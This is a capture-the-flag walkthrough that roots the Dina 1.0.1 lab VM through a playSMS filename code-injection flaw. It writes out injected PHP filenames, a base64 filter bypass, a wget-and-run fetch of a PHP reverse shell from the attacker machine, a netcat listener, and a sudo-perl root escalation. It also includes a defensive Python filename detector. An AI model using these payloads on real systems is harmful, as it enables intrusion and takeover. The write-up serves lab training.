• VM: Dina 1.0.1
  • Goal: acquire root access
  • Approach: solve without automated exploitation tools

Enumeration

Target Discovery

First locate the IP address of my target:

nmap -n -sn 192.168.172.200-
[Screenshot: host discovery]
Target: 192.168.172.234

Port Scanning

nmap -p- -A 192.168.172.234
[Screenshot: port scanning]

Port      Service/Banner
TCP 80    Apache 2.2.22 (Ubuntu)

Let’s look at the website.

[Screenshot: website]

nmap found a few folders. The only one that has something interesting is the /nothing/ folder.

[Screenshot: /nothing/ page]

There isn’t anything on this page. But if you look at the source of the page:

[Screenshot: view source]

There are some passwords in an HTML comment:

  • freedom
  • password
  • helloworld!
  • diana
  • iloveroot

Good start. But we need to find some places to use them. There aren’t any other webpages to check, so let’s do a folder scan to see if we can find some hidden files or folders.

Directory scan using gobuster

gobuster -u http://192.168.172.234:80/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -e -k -l -s "200,204,301,302,307,401,403" -x "txt,html,php,asp,aspx,jsp"
[Screenshot: gobuster output]

It finds a folder, /secure:

[Screenshot: /secure folder]

Navigating to the /secure folder shows a backup.zip file. Sounds like something of importance.

I download the file and uncompress it using 7z. A password is required. Trying the password list reveals that the password freedom unlocks the zip file.

[Screenshot: backup.zip]

There is only one file, called backup-cred.mp3. But it’s actually a text file, not an mp3 file. Let’s check out what’s inside.

[Screenshot: backup-cred.mp3 contents, hidden folder]

The file reveals a username, touhid, and a hidden folder, /SecreTSMSgatwayLogin. Looks like we hit something good. Let’s browse the hidden folder.

Exploitation

[Screenshot: playSMS login page]

It brings us to the login page of an open source SMS management software called playSMS. I try logging in using the username touhid and the passwords from the list, and I am able to get in with the password diana. That list of passwords proves to be very useful. 🙂

[Screenshot: playSMS logged in]

After browsing through some pages to get a general idea of the software, I use searchsploit to look for any vulnerability of the software.

[Screenshot: searchsploit results]

There’s a sendfromfile.php Remote Code Execution exploit available for Metasploit. I copy the file to check it out.

searchsploit -m 44599.rb

Based on the exploit description, the Send from file feature allows us to upload files, and if we use some PHP script as the filename, the script will be executed. Awesome, sounds like what we need to get our foot in the door.

So I use a simple script that outputs the text ‘Hello’ to test the vulnerability.

touch "<?php print 'Hello' ?>.php"

Now go to My account > Send from file to upload the file:

[Screenshot: send test file]

Select the file and click UPLOAD FILE:

[Screenshot: send test file success]

Awesome, it shows Hello instead of the PHP script. That means the script was executed.

Reverse shell

Time to get a reverse shell. I tried a few simple one-line reverse shells (bash, netcat, etc.) but none of them worked. So I decided to use a full PHP reverse shell. There’s already one available in Kali. I make a copy and name it shell4000.php. You would need to edit the file to use your attack machine’s IP address and a port. In my case, my Kali box IP is 192.168.172.110 and I use port 4000.

cp /usr/share/webshells/php/php-reverse-shell.php shell4000.php

Then update the IP address and port number:

$ip = '192.168.172.110';  // CHANGE THIS
$port = 4000;             // CHANGE THIS

Now we need to upload the reverse shell and then execute it by running the following commands:

wget http://192.168.172.110/shell4000.php -O /tmp/shell4000.php
php -f /tmp/shell4000.php

However, there is one issue: we have to put the script in the filename, and some characters such as ‘/’ are not allowed. We have a couple of options to bypass this character limitation:

  • Utilize the HTTP User-Agent header
<?php system($_SERVER['HTTP_USER_AGENT']) ?>

Instead of placing the full script in the filename, we use the HTTP_USER_AGENT header to store the actual PHP script. This option would require the use of a proxy server such as Burp.

  • Encoding

We can encode the script as filename and decode it during execution. A simple base64 encoding will do the trick.

I am going to use base64 encoding to bypass this limitation.

[Screenshot: base64 encoding of the commands]

As seen in the above image, I first obtain the base64 version of the command. Then use it in the filename and pipe it to base64 decode before execution.
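Both bypasses above work because the application treats the filename as code. From the defender’s side, the same traits make them easy to detect and to neutralise before storage. The following Python is an added example, not code from this write-up or from playSMS: a detector that flags upload filenames carrying PHP tags, dangerous calls, or a base64 run that decodes to a command, and an allowlist sanitiser. The sample filenames are constructed (the User-Agent and base64 variants follow the shapes described above; the wrapped command is a harmless stand-in).

```python
import base64
import re

# Constructed sample filenames (not from the write-up): one benign upload, the
# test file used above, the User-Agent variant, and the base64-wrapped variant.
_B64_CMD = base64.b64encode(b"id; uname -a; whoami").decode()   # harmless stand-in command
SAMPLE_FILENAMES = [
    "contacts-march.csv",
    "<?php print 'Hello' ?>.php",
    "<?php system($_SERVER['HTTP_USER_AGENT']) ?>.php",
    "<?php system('echo " + _B64_CMD + " | base64 -d | sh') ?>.php",
]

PHP_TAG = re.compile(r"<\?(php|=)?", re.IGNORECASE)
DANGEROUS_CALLS = re.compile(
    r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval|base64_decode)\s*\(", re.IGNORECASE)
B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")   # long base64-looking runs
SAFE_NAME = re.compile(r"^[A-Za-z0-9._-]{1,64}$")   # allowlist for stored names

def decoded_base64_runs(name):
    """Decode every base64-looking run so a wrapped command cannot hide from the checks."""
    decoded = []
    for m in B64_RUN.finditer(name):
        try:
            decoded.append(base64.b64decode(m.group(0), validate=True).decode("utf-8", "replace"))
        except ValueError:   # binascii.Error: not actually base64 (bad length/padding)
            pass
    return decoded

def classify_filename(name):
    """Return the reasons an upload filename looks like code injection ([] means clean)."""
    reasons = []
    if PHP_TAG.search(name):
        reasons.append("php-open-tag")
    if DANGEROUS_CALLS.search(name):
        reasons.append("dangerous-call")
    if any(PHP_TAG.search(t) or DANGEROUS_CALLS.search(t) or set(t) & set("|;&$`")
           for t in decoded_base64_runs(name)):
        reasons.append("base64-hides-command")
    if not SAFE_NAME.match(name):
        reasons.append("outside-allowlist")
    return reasons

def sanitize_filename(name):
    """Server-side fix: drop any path, keep only allowlisted characters, cap the length."""
    base = name.replace("\\", "/").rsplit("/", 1)[-1]
    return re.sub(r"[^A-Za-z0-9._-]", "_", base)[:64] or "upload"

if __name__ == "__main__":
    for n in SAMPLE_FILENAMES:
        print(f"{classify_filename(n) or ['clean']} <- {n!r} -> stored as {sanitize_filename(n)!r}")
```

Long legitimate alphanumeric names may trigger a decode attempt; the decoded text is only flagged if it contains a PHP tag, a dangerous call, or shell metacharacters.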

Good. We have the two files ready. Now set up a webserver to serve the shell file:

python -m SimpleHTTPServer 80

Next, set up netcat to listen on port 4000:

nc -nvlp 4000

Now it’s time to use the Send from file feature to upload the two files one by one to receive our shell.

[Screenshot: shell upload]

After uploading the first file, we see a request for shell4000.php at our webserver. Good.

[Screenshot: low-privilege shell]

A low-privilege shell is obtained after we upload the second file.

Privilege Escalation

The very first command I like to run after getting a shell is sudo -l. If the user has some sudo capabilities, that is the easiest way of getting root access.

[Screenshot: sudo -l output]

Yup, the user is allowed to run perl as root. That also means we can execute commands as root: all we need is to use perl to spawn a bash shell as root.

[Screenshot: root shell]

Root shell obtained. All right!

Capture the Flag

[Screenshot: flag]

Thank you to the author, Touhid Shaikh, for the box Dina 1.0.1.
